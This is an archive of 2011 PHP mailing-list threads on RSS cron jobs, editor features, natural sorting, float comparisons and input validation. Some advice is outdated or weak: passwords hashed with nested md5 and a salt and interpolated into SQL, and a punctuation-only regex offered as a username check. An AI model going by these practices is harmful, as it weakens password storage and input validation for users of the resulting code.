Use PHP threads. Do the job separately.. in parts... in other words... you can't read all them at once. You can read a little more about php multithreading here: http://blog.motane.lu/2009/01/02/multithreading-in-php/ You can use a non-relational database like mongo or couchdb to manage where you stop and where you have to look back to the RSS feed as well. []'s Regards, Igor Escobar *Software Engineer * + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar <http://www.twitter.com/igorescobar> On Sat, Sep 10, 2011 at 10:37 PM, Stuart Dallas wrote: > On 10 Sep 2011, at 09:35, muad shibani wrote: > > > I want to design an application that reads news from RSS sources. > > I have about 1000 RSS feed to collect from. > > > > I also will use Cron jobs every 15 minutes to collect the data. > > the question is: Is there a clever way to collect all those feed items > > without exhausting the server > > any Ideas > > I designed a job queuing system a while back when I had a similar problem. > You can read about it here: http://stut.net/2009/05/29/php-job-queue/. Set > that type of system up and add a job for each feed, set to run every 15 > minutes. You can then watch the server and tune the number of concurrent job > processors so you get the optimum balance between load and speed. > > -Stuart > > -- > Stuart Dallas > 3ft9 Ltd > http://3ft9.com/ > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
Re: [PHP] PHP cron job optimization
Other good point is: always set a timeout connection when you're getting the RSS data to avoid your thread get stuck unnecessary. Use cURL (is much more faster then file_get_contents). Multithreading in PHP with cURL http://devzone.zend.com/article/3341 Regards, Igor Escobar *Software Engineer * + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar <http://www.twitter.com/igorescobar> On Mon, Sep 12, 2011 at 10:05 AM, Igor Escobar wrote: > Use PHP threads. Do the job separately.. in parts... in other words... you > can't read all them at once. > > You can read a little more about php multithreading here: > http://blog.motane.lu/2009/01/02/multithreading-in-php/ > > You can use a non-relational database like mongo or couchdb to manage where > you stop and where you have to look back to the RSS feed as well. > > []'s > > Regards, > Igor Escobar > *Software Engineer > * > + http://blog.igorescobar.com > + http://www.igorescobar.com > + @igorescobar <http://www.twitter.com/igorescobar> > > > > > > > On Sat, Sep 10, 2011 at 10:37 PM, Stuart Dallas wrote: > >> On 10 Sep 2011, at 09:35, muad shibani wrote: >> >> > I want to design an application that reads news from RSS sources. >> > I have about 1000 RSS feed to collect from. >> > >> > I also will use Cron jobs every 15 minutes to collect the data. >> > the question is: Is there a clever way to collect all those feed items >> > without exhausting the server >> > any Ideas >> >> I designed a job queuing system a while back when I had a similar problem. >> You can read about it here: http://stut.net/2009/05/29/php-job-queue/. >> Set that type of system up and add a job for each feed, set to run every 15 >> minutes. You can then watch the server and tune the number of concurrent job >> processors so you get the optimum balance between load and speed. 
>> >> -Stuart >> >> -- >> Stuart Dallas >> 3ft9 Ltd >> http://3ft9.com/ >> -- >> PHP General Mailing List (http://www.php.net/) >> To unsubscribe, visit: http://www.php.net/unsub.php >> >> >
Re: [PHP] PHP cron job optimization
@Eric ok ;) Regards, Igor Escobar *Software Engineer * + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar <http://www.twitter.com/igorescobar> On Mon, Sep 12, 2011 at 10:52 AM, Eric Butera wrote: > On Mon, Sep 12, 2011 at 9:37 AM, Igor Escobar > wrote: > > Other good point is: always set a timeout connection when you're getting > the > > RSS data to avoid your thread get stuck unnecessary. Use cURL (is much > more > > faster then file_get_contents). > > > > Multithreading in PHP with cURL http://devzone.zend.com/article/3341 > > > > > > Regards, > > Igor Escobar > > *Software Engineer > > * > > + http://blog.igorescobar.com > > + http://www.igorescobar.com > > + @igorescobar <http://www.twitter.com/igorescobar> > > > > > > > > > > > > On Mon, Sep 12, 2011 at 10:05 AM, Igor Escobar >wrote: > > > >> Use PHP threads. Do the job separately.. in parts... in other words... > you > >> can't read all them at once. > >> > >> You can read a little more about php multithreading here: > >> http://blog.motane.lu/2009/01/02/multithreading-in-php/ > >> > >> You can use a non-relational database like mongo or couchdb to manage > where > >> you stop and where you have to look back to the RSS feed as well. > >> > >> []'s > >> > >> Regards, > >> Igor Escobar > >> *Software Engineer > >> * > >> + http://blog.igorescobar.com > >> + http://www.igorescobar.com > >> + @igorescobar <http://www.twitter.com/igorescobar> > >> > >> > >> > >> > >> > >> > >> On Sat, Sep 10, 2011 at 10:37 PM, Stuart Dallas > wrote: > >> > >>> On 10 Sep 2011, at 09:35, muad shibani wrote: > >>> > >>> > I want to design an application that reads news from RSS sources. > >>> > I have about 1000 RSS feed to collect from. > >>> > > >>> > I also will use Cron jobs every 15 minutes to collect the data. 
> >>> > the question is: Is there a clever way to collect all those feed > items > >>> > without exhausting the server > >>> > any Ideas > >>> > >>> I designed a job queuing system a while back when I had a similar > problem. > >>> You can read about it here: http://stut.net/2009/05/29/php-job-queue/. > >>> Set that type of system up and add a job for each feed, set to run > every 15 > >>> minutes. You can then watch the server and tune the number of > concurrent job > >>> processors so you get the optimum balance between load and speed. > >>> > >>> -Stuart > >>> > >>> -- > >>> Stuart Dallas > >>> 3ft9 Ltd > >>> http://3ft9.com/ > >>> -- > >>> PHP General Mailing List (http://www.php.net/) > >>> To unsubscribe, visit: http://www.php.net/unsub.php > >>> > >>> > >> > > > > Thread != Multi Process. >
Re: [PHP] What would you like to see in most in a text editor?
+ extensible plug-ins.

Regards,
Igor Escobar
*Software Engineer*
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar <http://www.twitter.com/igorescobar>

On Tue, Sep 13, 2011 at 6:13 PM, Alex Nikitin wrote:

> +1 on terminal.
>
> For gui-based ones, i like to be able to syntax check my code and run it
> from within the editor window, tabs for dozens of files i usually have open
> at once, highlight that supports many languages as i can be working on many
> at once (php, css, js, ruby, python, C, lua, sql, for the ones i have open
> in geany atm), shortcuts are essential for things like find or replace in a
> selected area or what have you, regex support in search, and something that
> can be themed with white on black.
>
> For web-based ones, i never want to have to physically press anything to
> save my work, and i expect it to be within a few words if i just closed the
> browser and came back. It can't use any more resources than a usual web-page
> and has to be responsive.
>
> For other features to think about, built in version control system, ability
> to sync with github or really any cvs/svn/git repo, diff tool integrated
> into the editor, collaboration.
>
> Essential 1: utmost security, if they pwn your servers, they should not be
> able to have my data, this means that some part of what i pass to you in my
> credentials needs to not even reside on your servers (for example you can
> use the salted hash to check my the password, but the clear text version is
> still needed to decrypt that user's data store) and for the ultra paranoid,
> i should be able to further protect my data store with another password the
> hash for which you don't store, but rather store the md5 of the hash.
> Essential 2: reliability, i would like to be in an N+N+1 where the service
> and my data are both highly available without performance degradation when
> one of the services/servers goes kablewey (technical term)
>
> Enjoy.
>
> --
> The trouble with programmers is that you can never tell what a programmer is
> doing until it’s too late. ~Seymour Cray
>
> On Tue, Sep 13, 2011 at 4:35 PM, Robert Cummings wrote:
>
> > On 11-09-13 03:56 PM, Brad Huskins wrote:
> >
> >> Hello all you php coders out there,
> >>
> >> I'm doing an Open Source text editor (just a hobby) that's designed for
> >> PHP developers and is accessible through the web. This has been stewing
> >> for a while, and has gotten to the point where I can use it for my own
> >> work. I would like any feedback on things that people really
> >> like/dislike about their current editors, as I believe some of these
> >> things could be resolved in mine.
> >>
> >> I currently have username/password protection (with Salted-Hash
> >> passwords), a file-system browser, file loading/saving, and syntax
> >> highlighting -- and these things seem to work reasonably well. As well,
> >> most things about the editor are scriptable with JavaScript. This would
> >> seem to imply that in a few weeks I would have something useful. So I
> >> would like to get some feedback on what features people would most want,
> >> since I am still at a very flexible stage in development.
> >>
> >> If you would like to see what I have, you can go to
> >> un1tware.wordpress.com. You can also peruse the code at
> >> github.com/bhus/scriptr. In particular, the README on github gives a
> >> little bit better rationality for why something like this might be
> >> useful, and how things are currently structured.
> >
> > I'm a big fan of editors that work in the terminal.
> >
> > Cheers,
> > Rob.
> > --
> > E-Mail Disclaimer: Information contained in this message and any
> > attached documents is considered confidential and legally protected.
> > This message is intended solely for the addressee(s). Disclosure,
> > copying, and distribution are prohibited unless authorized.
> >
> > --
> > PHP General Mailing List (http://www.php.net/)
> > To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Sort problem
Hi Folks!

Anyone know a smart way to order file names? An example for you guys to picture what I'm saying is:

The result of this snippet is:

Array
(
    [0] => Two And Half Man Season 1
    [1] => Two And Half Man Season 10
    [2] => Two And Half Man Season 2
    [3] => Two And Half Man Season 3
    [4] => Two And Half Man Season 4
    [5] => Two And Half Man Season 9
)

Anyone know how to solve this problem?

Regards,
Igor Escobar
*Software Engineer*
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar <http://www.twitter.com/igorescobar>
Re: [PHP] Sort problem
Wow! Thank you! I completely forgot this method!

Regards,
Igor Escobar
*Software Engineer*
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar <http://www.twitter.com/igorescobar>

On Wed, Sep 14, 2011 at 12:02 PM, Marc Guay wrote:

> > Anyone know a smart way to order file names?
>
> Nope, but I know a "natural" way:
> http://ca.php.net/manual/en/function.natsort.php
[PHP] Bug?
Anyone can explain this?

https://gist.github.com/1220404

Part of the code is in Portuguese, so...
iguais = equal
diferentes = different

Regards,
Igor Escobar
*Software Engineer*
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar <http://www.twitter.com/igorescobar>
Re: [PHP] Bug?
I'm confused about the output of the code... very disturbed. But @augustohp <https://gist.github.com/augustohp> already responded to the question on the gist thread (in Portuguese) and explained why those results occur.

Regards,
Igor Escobar
*Software Engineer*
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar <http://www.twitter.com/igorescobar>

On Thu, Sep 15, 2011 at 6:17 PM, Daniel Brown wrote:

> On Thu, Sep 15, 2011 at 17:07, Igor Escobar wrote:
> > Anyone can explain this?
> >
> > https://gist.github.com/1220404
> >
> > Part of the code is in Portuguese, so...
> > iguais = equal
> > diferentes = different
>
> About this part are you confused?
>
> --
> Network Infrastructure Manager
> http://www.php.net/
[PHP] Re: Bug?
Thank you guys.

Regards,
Igor Escobar
*Software Engineer*
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar <http://www.twitter.com/igorescobar>

On Thu, Sep 15, 2011 at 6:32 PM, Shawn McKenzie wrote:

> On 09/15/2011 04:07 PM, Igor Escobar wrote:
> > Anyone can explain this?
> >
> > https://gist.github.com/1220404
> >
> > Part of the code is in Portuguese, so...
> > iguais = equal
> > diferentes = different
> >
> > Regards,
> > Igor Escobar
> > *Software Engineer*
> > + http://blog.igorescobar.com
> > + http://www.igorescobar.com
> > + @igorescobar <http://www.twitter.com/igorescobar>
>
> 1. Obviously because of the issues with floating point precision these
> are stored as the same float, a la your next example.
>
> 2. Using bc math for binary calculations on string representations of a
> number overcomes the problems in 1.
>
> 3. This one is peculiar, but it seems that since they are numeric
> strings that they are being juggled to float for the comparison since
> using == there is no type checking. Using === yields a different
> result, presumably because forcing a type check compares them as
> strings. Use strcmp() to overcome this.
>
> 4. Do I need to explain this one?
>
> --
> Thanks!
> -Shawn
> http://www.spidean.com
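Point 3 of the quoted reply, as an added example that is not part of the original thread or the gist: `==` on two numeric strings compares their numeric values, which matters whenever the strings are digests or tokens. Every value in it is constructed, and the helper names are hypothetical.

```php
<?php
// Added example: every value below is constructed for illustration.

/** Loose comparison: two numeric strings are converted to numbers first. */
function loose_equal(string $a, string $b): bool
{
    return $a == $b;
}

/** Strict comparison: same type and same bytes, no conversion. */
function strict_equal(string $a, string $b): bool
{
    return $a === $b;
}

$pairs = [
    ['1e3', '1000'],                                        // exponent form
    ['0.12345678901234567890', '0.12345678901234567891'],  // beyond float precision
    ['0e1111', '0e2222'],                                    // both evaluate to 0.0
    ['abc', 'abd'],                                          // not numeric: compared as text
];

foreach ($pairs as [$a, $b]) {
    printf(
        "%-24s %-24s ==:%-5s ===:%-5s strcmp==0:%-5s hash_equals:%s\n",
        $a,
        $b,
        var_export(loose_equal($a, $b), true),
        var_export(strict_equal($a, $b), true),
        var_export(strcmp($a, $b) === 0, true),
        var_export(hash_equals($a, $b), true)
    );
}
```

The first three pairs compare equal under `==` and different under `===`, `strcmp()` and `hash_equals()`; for digests and other secrets, `hash_equals()` additionally compares in constant time.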
Re: [PHP] Escaping MySQL passwords necessary when md5 is used?
If you're converting the input data into an md5 hash, there is no reason to escape it.

Regards,
Igor Escobar
*Software Engineer*
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar <http://www.twitter.com/igorescobar>

On Wed, Sep 21, 2011 at 2:53 PM, Dotan Cohen wrote:

> I have an application in which the password is stored in the database
> as md5(md5('passWord').'userSpecificSalt'). I'm checking the password
> entered with:
> $password=md5( md5($_POST['password']).'userSpecificSalt' );
> $query="SELECT id FROM table WHERE password='{$password}'";
>
> Now I'm a bit queasy about not using mysql_real_escape_string() on
> that $password variable! Please reassure me or tell me the folly of my
> ways. Thanks!
>
> --
> Dotan Cohen
>
> http://gibberish.co.il
> http://what-is-what.com
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
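An added example, not code from the thread, assuming PHP 7.1 or later with the pdo_sqlite extension and a hypothetical `users` table: it checks that `md5()` output is always 32 hex characters, then performs the same login with bound parameters and `password_hash()`/`password_verify()`, so that query safety does not depend on each interpolated value happening to be a hash.

```php
<?php
// Added example: table, column and account names are assumptions.
// Uses an in-memory SQLite database (pdo_sqlite) so it runs offline.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (
    id INTEGER PRIMARY KEY,
    username TEXT UNIQUE NOT NULL,
    password_hash TEXT NOT NULL
)');

/** Store a salted, slow hash; password_hash() generates the salt itself. */
function register_user(PDO $db, string $username, string $password): void
{
    $stmt = $db->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
    $stmt->execute([$username, password_hash($password, PASSWORD_DEFAULT)]);
}

/** Return the user id on success, null otherwise. Input is only ever bound. */
function login(PDO $db, string $username, string $password): ?int
{
    $stmt = $db->prepare('SELECT id, password_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    return (int) $row['id'];
}

/** True when md5() of the input is exactly 32 lowercase hex characters. */
function md5_is_hex(string $input): bool
{
    return preg_match('/\A[0-9a-f]{32}\z/', md5($input)) === 1;
}

$hostile = "' OR '1'='1";   // constructed input
register_user($db, 'alice', 'correct horse battery staple');

var_dump(md5_is_hex($hostile));                                 // digest carries no quotes
var_dump(login($db, 'alice', 'correct horse battery staple')); // valid credentials
var_dump(login($db, 'alice', $hostile));                        // wrong password
var_dump(login($db, $hostile, 'anything'));                     // hostile username, bound
```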
Re: [PHP] How can I check for characters in a $_POST[] variable?
Use this regex:

if(preg_match('/[[:punct:]]/', $_POST['username']) !== 0) {
    // string contains other characters, write the code
}

The POSIX class [:punct:] matches any punctuation and symbols in your string, and that includes [!"#$%&'()*+,\-./:;<=>?@[\\\]^_`{|}~]

Regards,
Igor Escobar
*Software Engineer*
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar <http://www.twitter.com/igorescobar>

On Thu, Sep 22, 2011 at 9:17 AM, Nilesh Govindarajan wrote:

> On Thu 22 Sep 2011 08:25:29 PM IST, Eric wrote:
> > I have this problem when using php because my computer recognizes
> > the characters "." and ".." as an existing file when I use file_exists. Also
> > I want to check $_POST["username"] for characters other than A-Z a-z and 0-9.
> > If it contains anything other than, I would like to prompt the user but
> > I can't seem to use foreach properly and I don't know how to iterate
> > through the post variable with a for loop while loop or do while loop.
>
> file_exists() for . and .. would always return true, because they
> really exist! . is an alias for the current directory and .. for the
> parent directory. This is irrespective of OS.
>
> To search $_POST["username"] for characters other than A-Z, a-z, 0-9,
> you can use preg_match something like this (there's an alpha class as
> well, but I'm not sure about it):
>
> if(preg_match('(.*)^[A-Za-z0-9]+', $_POST['username']) !== 0) {
> // string contains other characters, write the code
> }
>
> --
> Nilesh Govindarajan
> http://nileshgr.com
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] How can I check for characters in a $_POST[] variable?
Or... just use:

if(preg_match('/^[A-Za-z0-9]+$/', $_POST['username']) === 0) {
    // string contains other characters, write the code
}

You can see this regex in action here:
http://regexpal.com/?flags=&regex=^%5BA-Za-z0-9%5D%2B%24&input=myusername01

If you put in anything other than A-Za-z0-9, the regex will not match.

Regards,
Igor Escobar
*Software Engineer*
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar <http://www.twitter.com/igorescobar>

On Thu, Sep 22, 2011 at 10:03 AM, Igor Escobar wrote:

> Use this regex:
> if(preg_match('/[[:punct:]]/', $_POST['username']) !== 0) {
> // string contains other characters, write the code
> }
>
> The POSIX class [:punct:] matches any punctuation and symbols in
> your string, and that includes [!"#$%&'()*+,\-./:;<=>?@[\\\]^_`{|}~]
>
> Regards,
> Igor Escobar
> *Software Engineer*
> + http://blog.igorescobar.com
> + http://www.igorescobar.com
> + @igorescobar <http://www.twitter.com/igorescobar>
>
> On Thu, Sep 22, 2011 at 9:17 AM, Nilesh Govindarajan wrote:
>
>> On Thu 22 Sep 2011 08:25:29 PM IST, Eric wrote:
>> > I have this problem when using php because my computer recognizes
>> > the characters "." and ".." as an existing file when I use file_exists. Also
>> > I want to check $_POST["username"] for characters other than A-Z a-z and 0-9.
>> > If it contains anything other than, I would like to prompt the user but
>> > I can't seem to use foreach properly and I don't know how to iterate
>> > through the post variable with a for loop while loop or do while loop.
>>
>> file_exists() for . and .. would always return true, because they
>> really exist! . is an alias for the current directory and .. for the
>> parent directory. This is irrespective of OS.
>>
>> To search $_POST["username"] for characters other than A-Z, a-z, 0-9,
>> you can use preg_match something like this (there's an alpha class as
>> well, but I'm not sure about it):
>>
>> if(preg_match('(.*)^[A-Za-z0-9]+', $_POST['username']) !== 0) {
>> // string contains other characters, write the code
>> }
>>
>> --
>> Nilesh Govindarajan
>> http://nileshgr.com
>>
>> --
>> PHP General Mailing List (http://www.php.net/)
>> To unsubscribe, visit: http://www.php.net/unsub.php
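The username checks discussed in the two replies above, side by side on constructed inputs. This is an added example, not code from the thread; the function names are hypothetical, and the `\A ... \z` allowlist is this example's own variant of the `^ ... $` pattern.

```php
<?php
// Added example: function names and sample inputs are constructed.

/** Allowlist: the whole string must be ASCII letters and digits.
 *  \A and \z anchor to the real start and end of the string. */
function username_is_valid(string $name): bool
{
    return preg_match('/\A[A-Za-z0-9]+\z/', $name) === 1;
}

/** Same class with ^ and $: "$" also matches just before a final newline. */
function dollar_anchored_match(string $name): bool
{
    return preg_match('/^[A-Za-z0-9]+$/', $name) === 1;
}

/** Denylist: reports only ASCII punctuation, nothing else. */
function has_punctuation(string $name): bool
{
    return preg_match('/[[:punct:]]/', $name) === 1;
}

$samples = [
    'myusername01',
    '.',
    '..',
    'bob smith',   // space is not punctuation
    "bob\n",       // trailing newline
    "bob\0",       // NUL byte
    '',            // empty string
];

foreach ($samples as $name) {
    printf(
        "%-16s allowlist_ok=%-5s dollar_ok=%-5s punct_found=%s\n",
        json_encode($name),
        var_export(username_is_valid($name), true),
        var_export(dollar_anchored_match($name), true),
        var_export(has_punctuation($name), true)
    );
}
```

Only `myusername01` passes the allowlist; the punctuation check reports nothing for the space, newline, NUL and empty inputs, and the `$`-anchored pattern accepts `"bob\n"`.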
Re: [PHP] Re:
No problem ;)

Regards,
Igor Escobar
*Software Engineer*
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar <http://www.twitter.com/igorescobar>

On Thu, Sep 22, 2011 at 1:25 PM, Eric wrote:

> Thanks Very much I used,
> preg_match('/[[:punct:]]/', $_POST['username']) !== 0
> and it works without errors. The reason I can't just use
> is_file which I wish I could is because windows doesn't allow question marks
> or some weird character. It decides to not allow php to make the file if there
> are odd ball characters. It is a very unfortunate mistake in my code that I
> wish php would ignore and just make the file "?".